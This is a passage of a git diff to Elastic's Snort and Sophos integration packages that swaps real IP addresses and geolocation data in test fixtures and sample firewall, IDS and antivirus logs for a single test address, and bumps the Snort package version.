,1,2011716,4,\"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)\",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:56:44.310-06:00", "kind": "alert", @@ -193,25 +193,24 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.1", - "ip": "104.5.30.1" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "ICMP Packet", @@ -221,31 +220,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "San Antonio", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Texas", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -98.437, - "lat": 29.6285 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 7018, + "number": 4837, "organization": { - "name": "AT\u0026T Services, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "104.5.30.130", - "ip": "104.5.30.130" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:tgCGB6IwKNaKy9rAfETAo1iSN6c=", + "community_id": "1:ae//KI+huidgn9Nxeaibd8SUiVA=", "transport": "icmp", "type": "ipv4", "direction": "external" @@ -261,14 +259,13 @@ }, "related": { "ip": [ - "104.5.30.130", - "104.5.30.1" + "175.16.199.1" ] }, "event": { "severity": 0, - "ingested": "2021-09-20T12:26:55.088065287Z", - "original": "09/03/21-16:29:03.494387 ,1,477,3,\"ICMP Packet\",ICMP,104.5.30.130,,104.5.30.1,,40546,,0,alert,Allow", + "ingested": "2021-12-09T13:44:51.135058700Z", + "original": "09/03/21-16:29:03.494387 ,1,477,3,\"ICMP Packet\",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T16:29:03.494-06:00", "kind": "alert", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log index d5ec77c0258..b242df14f24 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log @@ -1,3 +1,3 @@ Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -> 10.25.10.22:32414 Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -> 10.50.10.190:22 -Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 142.251.33.14 \ No newline at end of file +Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -> 175.16.199.1 \ No newline at end of file diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json index 598a056a102..ea2b979c40d 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json @@ -47,7 +47,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:56.913274558Z", + "ingested": "2021-12-09T13:44:51.600089400Z", "original": "Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -\u003e 10.25.10.22:32414", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -106,7 +106,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:56.913284132Z", + "ingested": "2021-12-09T13:44:51.600098200Z", "original": "Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -\u003e 10.50.10.190:22", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -125,22 +125,24 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "142.251.33.14", - "ip": "142.251.33.14" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "description": "Pinging...", @@ -156,7 +158,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AxRhCEROBWkzOLpDpKAkFeQT7/w=", + "community_id": "1:AwywM3uuS+luH6U/hUKtj2x2LWU=", "transport": "icmp", "type": "ipv4", "direction": "outbound" @@ -174,13 +176,13 @@ "related": { "ip": [ "10.50.10.88", - "142.251.33.14" + "175.16.199.1" ] }, "event": { "severity": 3, - "ingested": "2021-09-20T12:26:56.913287234Z", - "original": "Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -\u003e 142.251.33.14", + "ingested": "2021-12-09T13:44:51.600104Z", + "original": "Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-09-05T16:02:55.000-05:00", "kind": "alert", diff --git a/packages/snort/manifest.yml b/packages/snort/manifest.yml index 169dc60cd91..1206d23f2cc 100644 --- a/packages/snort/manifest.yml +++ b/packages/snort/manifest.yml @@ -1,6 +1,6 @@ name: snort title: Snort -version: 0.1.0 +version: 0.1.1 release: experimental description: Collect logs from Snort with Elastic Agent. type: integration diff --git a/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log b/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log index 85a69585c91..d619a45bbd8 100644 --- a/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log +++ b/packages/sophos/_dev/deploy/docker/sample_logs/sophos-xg.log @@ -1,7 +1,7 @@ <30>device="SFW" date=2020-05-18 time=14:38:48 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041101618035 log_type="Anti-Spam" log_component="SMTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="firewall@firewallgate.com" to_email_address="Sysadmin@elasticuser.com" email_subject="*ALERT* Sophos XG Firewall" mailid="qkW2Y6-LxBk6U-vH-1590055245" mailsize=19728 spamaction="QUEUED" reason="Email has been accepted by Device and queued for scanning." src_domainname="elasticuser.com" dst_domainname="" src_ip="" src_country_code="" dst_ip="" dst_country_code="" protocol="TCP" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" +<30>device="SFW" date=2020-05-18 time=14:38:49 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=041105613003 log_type="Anti-Spam" log_component="SMTP" log_subtype="Clean" status="" priority=Information fw_rule_id=22 user_name="" av_policy_name="Default" from_email_address="telekommunikation@constant-big.email" to_email_address="info@pelasticuser.com" email_subject="Telefonservice statt Anrufbeantworter" mailid="device="SFW" date=2020-05-18 time=14:38:50 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=041107413001 log_type="Anti-Spam" log_component="SMTP" log_subtype="Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="Spam" from_email_address="ripxfc@17buddies.net" to_email_address="hein.mueck@elasticuser.de" email_subject="nimm dringend Geld" mailid="device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=045908413004 log_type="Anti-Spam" log_component="SMTPS" log_subtype="Probable Spam" status="" priority=Warning fw_rule_id=22 user_name="" av_policy_name="rule3" from_email_address="SHERIF.TOBGI@ELTOBGI.COM" to_email_address="info@elasticuser.com" email_subject="09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20" mailid="<20200518070235.C1623996C64F9957@ELTOBGI.COM>" mailsize=1032152 spamaction="Prefix Subject" reason="Sender IP address is blacklisted." src_domainname="ELTOBGI.COM" dst_domainname="" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="RBL" <30>device="SFW" date=2017-01-31 time=18:34:41 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041113413005 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="Gaurav123" from_email_address="gaurav1@iview.com" to_email_address=" gaurav2@iview.com" email_subject="RPD Spam Test: Spam" mailid="" mailsize=405 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=11:10:11 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041114413006 log_type="Anti-Spam" log_component="SMTP" log_subtype="Outbound Probable Spam" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="rule 8" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman.local" email_subject="RPD Spam test: Bulk" mailid="" mailsize=439 spamaction="Drop" reason="Mail detected as OUTBOUND PROBABLE SPAM." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Spam" <30>device="SFW" date=2018-06-06 time=12:50:07 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041121613009 log_type="Anti-Spam" log_component="SMTP" log_subtype="DLP" status="" priority=Information fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil@postman.local" to_email_address="pankhil1@Postman. local" email_subject="Fwd: TESt" mailid="c0000002-1528269606" mailsize=5041 spamaction="DROP" reason="Email containing confidential data detected. Relevant Data Protection Policy applied." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="DLP" @@ -9,39 +9,39 @@ <30>device="SFW" date=2018-06-06 time=12:53:39 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041123413012 log_type="Anti-Spam" log_component="SMTP" log_subtype="Dos" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="" to_email_address="" email_subject="" mailid="" mailsize=0 spamaction="TMPREJECT" reason="SMTP DoS" src_domainname="" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=12:56:53 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=041102413014 log_type="Anti-Spam" log_component="SMTP" log_subtype="Denied" status="" priority=Warning fw_rule_id=0 user_name="" av_policy_name="postman" from_email_address="pankhil1@postman.local" to_email_address="pankhil@postman. local" email_subject="Fwd: test sand" mailid="c0000008-1528270010" mailsize=419835 spamaction="DROP" reason="Email is marked Malicious by Sophos Sandstorm." src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol="TCP" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2017-01-31 time=18:31:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=041207414001 log_type="Anti-Spam" log_component="POP3" log_subtype="Spam" status="" priority=Warning fw_rule_id=0 user_name="gaurav" av_policy_name="GauravPatel" from_email_address="gaurav1@iview.com" to_email_address="gaurav2@iview. com" email_subject="RPD Spam Test: Spam" mailid="<2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com>" mailsize=574 spamaction="Accept" reason="" src_domainname=" iview.com" dst_domainname="iview.com" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol="TCP" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" -<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.93 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=172.16.34.24 src_country_code=R1 dst_ip=13.226.155.18 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=82.165.194.211 src_country_code=DEU dst_ip=186.8.209.194 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=23.254.247.78 src_country_code=USA dst_ip=185.7.209.194 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:33 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="Sandstorm" url="http://sophostest.com/Sandstorm/SBTestFile1.pdf" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=030906208001 log_type="Anti-Virus" log_component="HTTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=2 user_name="" iap=13 av_policy_name="" virus="EICAR-AV-Test" url="http://sophostest.com/eicar/index.html" domainname="sophostest.com" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol="TCP" src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" status_code=403 +<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="info@farasamed.com" to_email_address="info@elastic-user.local" subject="ZAHLUNG (PROFORMA INVOICE)" mailid="<20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr" mailsize=2254721 virus="TR/AD.AgentTesla.eaz" filename="" quarantine="" src_domainname="farasamed.com" dst_domainname="" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=031106210001 log_type="Anti-Virus" log_component="SMTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=22 user_name="" av_policy_name="default-smtp-av" from_email_address="spedizioni@divella.it" to_email_address="info@elastic-user.local" subject="Re: NEW PRO-FORMA INVOICE" mailid="<20200519072944.AFCA295AF2A037A6@divella.it>" mailsize=537457 virus="Mal/BredoZp-B" filename="" quarantine="" src_domainname="divella.it" dst_domainname="" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol="TCP" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason="Infected" <30>device="SFW" date=2018-06-06 time=10:51:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036106211001 log_type="Anti-Virus" log_component="POPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="pankhil@postman.local" subject="EICAR" mailid="" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-06 time=10:58:29 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=036206212001 log_type="Anti-Virus" log_component="IMAPS" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" av_policy_name="None" from_email_address="pankhil@postman.local" to_email_address="ganga@postman.local" subject="EICAR test email" mailid="<2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local>" mailsize=0 virus="EICAR-AV-Test" filename="" quarantine="" src_domainname="postman.local" dst_domainname="" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol="TCP" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason="Other" <30>device="SFW" date=2018-06-21 time=19:50:23 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031006209001 log_type="Anti-Virus" log_component="FTP" log_subtype="Virus" status="" priority=Critical fw_rule_id=0 user_name="" virus="EICAR-AV-Test" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Upload" filename=" /home/ftp-user/ta_test_file_1ta-cl1-46" file_size=0 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="STOR" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol="TCP" src_port=39910 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=0 <30>device="SFW" date=2018-06-21 time=19:50:48 timezone="CEST" device_name="SF01V" device_id=SFDemo-2df0960 log_id=031001609002 log_type="Anti-Virus" log_component="FTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=0 user_name="" virus="" FTP_url="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" FTP_direction="Download" filename="/home/ftp-user /ta_test_file_1ta-cl1-46" file_size=19926248 file_path="/var/www//home/ftp-user/ta_test_file_1ta-cl1-46" ftpcommand="RETR" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol="TCP" src_port=39936 dst_port=21 dstdomain="" sent_bytes=0 recv_bytes=19926248 -<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=086304418010 log_type="ATP" log_component="Firewall" log_subtype="Drop" priority=Warning user_name="jsmith" protocol="TCP" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=46.161.30.47 url=46.161.30.47 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:34 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57579 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2020-05-18 time=14:38:35 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=086504418010 log_type="ATP" log_component="Web" log_subtype="Drop" priority=Warning user_name="" protocol="TCP" src_port=57540 dst_port=80 sourceip=172.16.34.24 destinationip=13.226.155.22 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype="Standard" login_user="" process_user="" ep_uuid="" execution_path="" -<30>device="SFW" date=2018-06-05 time=08:49:00 timezone="BST" device_name="XG310" device_id=C30006T22TGR89B log_id=086320518009 log_type="ATP" log_component="Firewall" log_subtype="Alert" priority=Notice user_name="" protocol="ICMP" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=82.211.30.202 url=82.211.30.202 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype="Standard" login_user="" process_user="" ep_uuid= execution_path="" -<30>device="SFW" date=2017-01-31 time=14:03:33 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="jsmith" user_gp="Open Group" iap=1 category="Entertainment" category_type="Unproductive" url="https://r8---sn-ci5gup-qxas.googlevideo.com/" contenttype="" override_token="" httpresponsecode="" src_ip=10.198.47.71 dst_ip=182.79.221.19 protocol="TCP" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname="" reason="" -<30>device="SFW" date=2017-02-01 time=18:20:21 timezone="IST" device_name="SG115" device_id=S110000E28BA631 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=1 user_name="" user_gp="" iap=13 category="Religion & Spirituality" category_type="Unproductive" url="http://hanuman.com/" contenttype="" override_token="" httpresponsecode="" src_ip=5.5.5.15 dst_ip=216.58.197.44 protocol="TCP" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname="" -<30>device="SFW" date=2017-02-01 time=18:13:29 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=054402617051 log_type="Content Filtering" log_component="Application" log_subtype="Denied" priority=Information fw_rule_id=1 user_name="" user_gp="" application_filter_policy=8 category="Mobile Applications" application_name="Gtalk Android" application_risk=4 application_technology="Client Server" application_category="Mobile Applications" src_ip=5.5.5.15 src_country_code=DEU dst_ip=74.125.130.188 dst_country_code=USA protocol="TCP" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status="Deny" message="" -<30>device="SFW" date=2020-05-18 time=14:38:51 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.10 dst_ip=13.79.168.201 protocol="TCP" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions="" activityname="" reason="" user_agent="" status_code="400" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=80042000 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:52 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=050902616002 log_type="Content Filtering" log_component="HTTP" log_subtype="Denied" status="" priority=Information fw_rule_id=51 user_name="" user_gp="" iap=2 category="IPAddress" category_type="Acceptable" url="https://40.90.137.127/" contenttype="" override_token="" httpresponsecode="" src_ip=172.16.34.15 dst_ip=40.90.137.127 protocol="TCP" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=40.90.137.127 exceptions="" activityname="" reason="" user_agent="" status_code="200" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=642960832 application="" app_is_cloud=0 override_name="" override_authorizer="" -<30>device="SFW" date=2020-05-18 time=14:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=050901616001 log_type="Content Filtering" log_component="HTTP" log_subtype="Allowed" status="" priority=Information fw_rule_id=2 user_name="" user_gp="" iap=13 category="Information Technology" category_type="Acceptable" url="http://update.eset.com/eset_upd/ep7/dll/update.ver.signed" contenttype="" override_token="" httpresponsecode="" src_ip=172.17.34.15 dst_ip=91.228.167.133 protocol="TCP" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname="" reason="" user_agent="EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; " status_code="304" transactionid="" referer="" download_file_name="" download_file_type="" upload_file_name="" upload_file_type="" con_id=248426360 application="" app_is_cloud=0 override_name="" override_authorizer="" +<30>device="SFW" date=2017-01-31 time=18:44:31 timezone="IST" device_name="CR750iNG-XP" 